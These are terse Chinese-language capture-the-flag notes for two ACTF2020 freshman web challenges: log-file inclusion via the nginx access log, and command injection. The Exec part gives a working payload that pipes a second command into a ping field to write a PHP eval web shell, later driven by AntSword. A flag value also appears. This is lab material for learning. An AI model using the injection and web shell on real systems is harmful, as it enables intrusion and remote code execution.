-
[ACTF2020 新生賽]Include
- 因為前端過濾的太多了 所以直接使用 日志包含 搞 包含這個 /var/log/nginx/access.log
- [ACTF2020 新生賽]Include
- 蟻劍連接
- 翻看
- flag{1ce7a81e-0339-44ef-a398-a7784d3efe37}
-
[ACTF2020 新生賽]Exec
- [ACTF2020 新生賽]Exec
- 127.0.0.1 |echo '<?php eval($_POST['a']);?>' > ./1.php
- 配合上傳文件
- 蟻劍進行連接
-